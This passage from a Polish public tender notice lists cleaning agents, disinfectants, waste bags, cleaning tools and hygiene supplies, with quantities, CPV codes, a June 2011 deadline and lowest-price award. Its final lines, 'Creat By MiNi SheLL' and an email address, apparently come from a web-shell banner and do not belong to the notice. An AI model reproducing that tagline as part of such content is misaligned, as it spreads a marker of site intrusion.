f)	Środek czyszczący do powierzchni, w opakowaniu do 10 litrów, ilość szacunkowa - 80 op. po 10 litrów (łącznie 800 litrów). CPV:39830000-9. PN-EN-1276:2000/Ap1:2001.
g)	Płyn lub żel o działaniu odtłuszczającym, w opakowaniu do 10 litrów, ilość szacunkowa - 20 op. po 10 litrów (łącznie 200 litrów). CPV: 39831230-7.
h)	Antybakteryjne mydło w płynie, o przyjemnym zapachu, w opakowaniu do 5 litrów, ilość szacunkowa - 20 op. po 5 litrów (łącznie 100 litrów). CPV: 33711900-6. PN-EN-1040:2006.
i)	Środek myjąco-dezynfekujący w opakowaniu do 10 litrów, ilość szacunkowa - 54 op. po 10 litrów (łącznie 540 litrów). CPV: 39830000-9.
j)	Tabletki czyszczące do pieca konwekcyjnego typ RATIONAL, o wadze 55g-65g netto, ilość szacunkowa - 800 szt. CPV: 39830000-9.
k)	Tabletki nabłyszczające do pieca konwekcyjnego typ RATIONAL, o wadze 55g-65g netto, ilość szacunkowa - 800 szt. CPV: 39830000-9.
l)	Uniwersalny, kwaśny środek czyszczący w opakowaniu do 1000ml, ilość szacunkowa 120 op. po 1000ml (łącznie 120 litrów). CPV: 39830000-9. PN-EN-1040:2006.

Szczegółowy opis przedmiotów zamówienia znajduje się w siwz..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.83.20.00-3, 39.83.00.00-9, 39.81.30.00-4, 39.83.12.30-7, 33.71.19.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> grupa 3.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> a)	Środek do dezynfekcji rąk, łagodny dla skóry, w opakowaniu do 500 ml, ilość szacunkowa - 100 op. po 500ml (łącznie 50 litrów). CPV: 33741300-9. Na czas trwania umowy wykonawca przekaże w bezpłatne użytkowanie dozowniki łokciowe dostosowane do w/w środka w ilości 26 sztuk.
b)	Środek do dezynfekcji rąk, łagodny dla skóry w opakowaniu do 100 ml, ilość szacunkowa 66 op. po 100ml (łącznie 6,6 litra). CPV: 33741300-9.
c)	Emulsja wodno-oleista do intensywnej pielęgnacji skóry, w opakowaniu do 500 ml, ilość szacunkowa - 60 op. po 500ml (łącznie 30 litrów). CPV: 33711540-4. Na czas trwania umowy wykonawca przekaże w bezpłatne użytkowanie dozowniki łokciowe dostosowane do w/w środka w ilości 12 sztuk.
d)	Bezbarwny antyseptyk do skóry, w opakowaniu do 350 ml, ilość szacunkowa - 40 op. po 350 ml (łącznie 14 litrów). CPV: 39830000-9.
e)	Bezaldehydowy dezynfektant silnie czyszczący do czyszczenia odsysaczy, w opakowaniu do 1000 ml, ilość szacunkowa - 7 op. po 1000 ml (łącznie 7 litrów). CPV: 39830000-9.
f)	Pianka do dezynfekcji powierzchni nieodpornych na działanie alkoholi, ze spryskiwaczem w opakowaniu od 500 ml do 1000 ml, ilość szacunkowa - 45 op. po 1000 ml (łącznie 45 litrów). CPV: 39830000-9.
g)	Gotowe do użycia, alkoholowe chusteczki do powierzchni, w plastikowych opakowaniach. W opakowaniu do 100 szt., ilość szacunkowa - 54 op. po 100szt. (łącznie 5400 szt.). CPV: 39830000-9.
h)	Gotowe do użycia, bezalkoholowe chusteczki do dezynfekcji aparatury medycznej, w plastikowych opakowaniach. W opakowaniu do 200 szt., ilość szacunkowa - 10 op. po 200szt. (łącznie 2000 szt.). CPV: 39830000-9.
i)	Preparat do mycia i dezynfekcji zanieczyszczonych narzędzi chirurgicznych, w opakowaniu do 6 litrów, ilość szacunkowa - 7 op. po 6 litrów (łącznie 42 litry). CPV: 39830000-9.
j)	Preparat do mycia i dezynfekcji: wyrobów medycznych, powierzchni, wyposażenia w gabinetach zabiegowych, w opakowaniu do 2 litrów, z dozownikiem, ilość szacunkowa - 30 op. po 2 litry (łącznie 60 litrów). CPV: 39830000-9.
k)	Preparat skuteczny w niskim stężeniu, do sporządzania roztworów roboczych, zimna i ciepła woda, nie wymaga zmywania wodą i nie pozostawia osadów, może być używany w obecności pacjentów. Preparat w opakowaniu do 6 litrów, ilość szacunkowa - 10 op. po 6 litrów (łącznie 60 litrów). CPV: 39830000-9.
l)	Preparat w postaci granulatu do zasypywania plam krwi na bazie NaDCC, w opakowaniu do 500g netto, ilość szacunkowa - 6 op. po 500g (łącznie 3 kg). CPV: 39830000-9.
m)	Tabletki do dezynfekcji dużych powierzchni, w opakowaniu do 150 tabletek, ilość szacunkowa - 5 op. po 150 tabl. (łącznie 750 tabl.). CPV: 39830000-9.
n)	Pianka do higienicznego i chirurgicznego mycia rąk, w opakowaniu do 400 ml, ilość szacunkowa 150 op. po 400 ml (łącznie 60 litrów). CPV: 39830000-9. Na czas trwania umowy wykonawca przekaże w bezpłatne użytkowanie dozowniki łokciowe dostosowane do w/w środka w ilości 30 sztuk.
o)	Preparat piorąco-dezynfekcyjny do prania mopów, w opakowaniu do 6 kg netto, ilość szacunkowa - 7 op. po 6 kg (łącznie 42 kg). CPV: 39831000-6.
p)	Uniwersalny środek do gruntownego mycia posadzek, w opakowaniu do 10 litrów, ilość szacunkowa 1 op. po 10 litrów (łącznie 10 litrów). CPV:39831000-6.
q)	Koncentrat do podłóg, przeznaczony do obiektów służby zdrowia, w opakowaniu do 5 litrów, ilość szacunkowa 1 op. po 5 litrów (łącznie 5 litrów). CPV: 39831000-6.
r)	Koncentrat do wszystkich wodoodpornych posadzek błyszczących i zabezpieczonych powłokami akrylowymi, w opakowaniu do 1000 ml, ilość szacunkowa 24 op. po 1000 ml (łącznie 24 litry). CPV:39831000-6.

Szczegółowy opis przedmiotów zamówienia znajduje się w siwz..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.74.13.00-9, 33.71.15.40-4, 39.83.00.00-9, 39.83.10.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> grupa 4.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> a)	Jednorazowe worki na odpady, z tworzywa sztucznego, ilość szacunkowa - 15000 szt. Worki duże, grube, w kolorze czarnym lub niebieskim, o poj. od 140 do 160 litrów. CPV: 19520000-7.
b)	Jednorazowe worki na odpady, z tworzywa sztucznego, ilość szacunkowa - 5000 szt. Worki średnie, grube, w kolorze czarnym, o poj. od 50 do 60 litrów. CPV: 19520000-7.
c)	Jednorazowe worki na odpady, z tworzywa sztucznego, ilość szacunkowa - 15000 szt. Worki małe w kolorze czarnym, o poj. od 35 do 45 litrów. CPV: 19520000-7.
d)	Jednorazowe worki na odpady, worki z tworzywa sztucznego, ilość szacunkowa - 1200 szt. Worki średnie, grube, w kolorze niebieskim, o poj. od 50 do 60 litrów. CPV: 19520000-7.
e)	Jednorazowe worki na odpady medyczne, worki z tworzywa sztucznego, ilość szacunkowa - 1000 szt. Worki duże, grube, w kolorze czerwonym, o poj. od 120 do 140 litrów. Worki z zamknięciem uniemożliwiającym ich ponowne otwarcie. CPV: 19520000-7.
f)	Jednorazowe worki na odpady medyczne, worki z tworzywa sztucznego, ilość szacunkowa - 2500 szt. Worki średnie, grube, w kolorze czerwonym, o poj. od 50 do 60 litrów. Worki z zamknięciem uniemożliwiającym ich ponowne otwarcie. CPV: 19520000-7.
g)	Jednorazowe worki na odpady medyczne, worki z tworzywa sztucznego, ilość szacunkowa - 200 szt. Worki średnie, grube, w kolorze żółtym, o poj. od 50 do 60 litrów. Worki z zamknięciem uniemożliwiającym ich ponowne otwarcie. CPV: 19520000-7.
h)	Jednorazowe woreczki foliowe do żywności, w opakowaniu od 100 szt. do 1000 szt., ilość szacunkowa 95 op. po 1000 szt. (łącznie 95000 sztuk). Woreczki o grubości folii 7 ?m i wymiarach 20cm x 35cm. CPV: 19520000-7. 
i)	Jednorazowe woreczki foliowe do żywności, w opakowaniu od 10 szt. do 100 szt., ilość szacunkowa 145 op. po 100 szt. (łącznie 14500 sztuk). Woreczki o grubości folii 40 ?m i wymiarach 50cm x 60cm. CPV: 19520000-7.
j)	Szczotka toaletowa do WC, z tworzywa sztucznego, ilość szacunkowa - 150 szt. CPV: 39224310-4.
k)	Szczotka (szrober), końcówka bez kija wykonana z drewna, ilość szacunkowa - 200 szt. CPV: 39224200-0.
l)	Szczotka ręczna wykonana z tworzywa sztucznego lub drewniana, ilość szacunkowa - 50 szt. CPV: 39224200-0.
m)	Mop supełkowy płaski, ilość szacunkowa - 30 kpl. CPV: 39220000-0.
n)	Wkład do mopa supełkowego płaskiego, ilość szacunkowa - 120 szt. CPV: 39220000-0.
o)	Kij drewniany z gwintem, ilość szacunkowa - 200 szt. Kij o wymiarach: dł. od 140 do 150 cm i O2 cm. CPV: 44514100-7.
p)	Kij drewniany bez gwinta, ilość szacunkowa - 150 szt. Kij o wymiarach: dł. od 140 do 150 cm i O2 cm. CPV: 44514100-7.
q)	Miska wykonana z tworzywa sztucznego, ilość szacunkowa - 200 szt. Miska o pojemności od 15-20 litrów, w kolorze: żółtym, czerwonym, brązowym lub niebieskim. CPV: 19520000-7.
r)	Druciak metalowy spiralny, ilość szacunkowa - 600 szt. CPV: 44316400-2.
s)	Szufelka z tworzywa sztucznego z uchwytem, ilość szacunkowa - 150 szt. CPV: 19520000-7.
t)	Zmiotka wykonana z tworzywa sztucznego lub drewna, ilość szacunkowa - 150 szt. CPV: 39812400-1.
u)	Wiadro z tworzywa sztucznego, ilość szacunkowa - 150 szt. Wiadro w kolorze czerwonym, niebieskim lub szarym, o pojemności od 10-12 litrów, z uchwytem umożliwiającym przenoszenie. CPV: 39224330-0.
v)	Miotła drewniana bez kija, ze sztucznym lub naturalnym włosiem, ilość szacunkowa - 200 szt. Miotła z otworem do mocowania trzonka O2 cm. CPV: 39224100-9.
w)	Miotła typu - ulicówka, ilość szacunkowa - 50 szt. CPV:39224100-9.
x)	Gąbka kuchenna, ilość szacunkowa - 200 szt. CPV: 39224320-7.
y)	Ściągaczka do wody, ilość szacunkowa - 50 szt. Ściągacz do usuwania wody, metalowo-gumowy, o szer. od 60 do 80 cm. CPV: 39220000-0.
z)	Ściągaczka do wody, ilość szacunkowa - 30 szt. Ściągacz do usuwania wody, metalowo-gumowy, o szer. od 40 do 50 cm. CPV: 39220000-0.
aa)	Ścierka do czyszczenia, ilość szacunkowa - 200 szt. CPV: 39525100-9.
bb)	Kosz na odpady z zamykaną pokrywą uchylną, ilość szacunkowa - 40 szt. Kosz wykonany z tworzywa sztucznego. Kosz o pojemność 25 litrów dostosowany do worków jednorazowych. CPV: 34928480-6.
cc)	Pojemnik na odpady - duży, ilość szacunkowa - 15 szt. Pojemnik o pojemności 120 litrów, w kolorach: zielonym, szarym lub brązowym, dostosowany do worków jednorazowych. CPV: 34928480-6.
dd)	Papier toaletowy jednowarstwowy, ekologiczny, w rolkach o długości min. 20 mb, ilość szacunkowa - 4500 szt. CPV: 33761000-2.
ee)	Papier toaletowy dwuwarstwowy, ekologiczny, biały, w rolkach o długości min. 20 mb, ilość szacunkowa - 120 szt. CPV: 33761000-2.
ff)	Ręcznik papierowy dwuwarstwowy, 100% celulozy, w opakowaniu od 2 do 4 rolek, ilość szacunkowa - 575 op. po 4 rolki (łącznie 2300 rolek). CPV: 33763000-6.
gg)	Ręczniki papierowe w płatkach, o wymiarach 11x25 cm, w opakowaniu od 2000 szt. do 4000 szt. ilość szacunkowa - 180 opakowań po 4000 szt. (łącznie 720.000 pojedynczych ręczników papierowych). CPV: 33763000-6.
hh)	Kubeczki jednorazowe z tworzywa sztucznego do zimnej wody, przeznaczone do kontaktu z żywnością, o pojemności 0,2 litra, w opakowaniu od 50 do 100 szt., ilość szacunkowa - 41 op. po 100 szt. (łącznie 4100 sztuk). CPV: 19520000-7.

Szczegółowy opis przedmiotów zamówienia znajduje się w siwz..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 19.52.00.00-7, 39.22.43.10-4, 39.22.42.00-0, 39.22.00.00-0, 44.51.41.00-7, 44.31.64.00-2, 39.81.24.00-1, 39.22.43.30-0, 39.22.41.00-9, 39.22.43.20-7, 34.92.84.80-6, 33.76.10.00-2, 33.76.30.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> grupa 5.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> a)	Podpaski higieniczne w opakowaniu 10 szt. Ilość szacunkowa - 20 op. po 10 szt. (łącznie 200 podpasek). CPV: 33771100-6.
b)	Szczoteczka do zębów wykonana z tworzywa sztucznego, ilość szacunkowa - 504 szt. CPV: 33711710-7.
c)	Środek owadobójczy w postaci zawieszki do zwalczania moli, ilość szacunkowa - 360 szt. CPV: 33691000-0.
d)	Krem do pielęgnacji dłoni w opakowaniu 100ml, ilość szacunkowa - 429 op. po 100ml. CPV: 33711540-4.
e)	Pasta do obuwia-czarna w opakowaniu 30g-40g netto, ilość szacunkowa 36 op. po 40g (łącznie 1,44kg). CPV: 39812200-9.
f)	Środek do dezynfekcji obuwia w opakowaniu nie mniejszym niż 150 ml, ilość szacunkowa 12 op. po 150 ml (łącznie 1800ml). CPV: 24457000-2.
g)	Pasta BHP w opakowaniu 500g netto, ilość szacunkowa 330 op. po 500g. CPV: 39813000-4.
h)	Proszek do prania w opakowaniu 200g netto, ilość szacunkowa 11884 op. po 200g. CPV: 39831000-6.
i)	Uniwersalny proszek do prania przemysłowego w opakowaniach 20-30kg netto, ilość szacunkowa 254 op. po 20 kg (łącznie 5080 kg). CPV: 39831000-6.

Szczegółowy opis przedmiotów zamówienia znajduje się w siwz..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.77.11.00-6, 33.69.10.00-0, 33.71.15.40-4, 39.81.22.00-9, 24.45.70.00-2, 39.81.30.00-4, 39.83.10.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com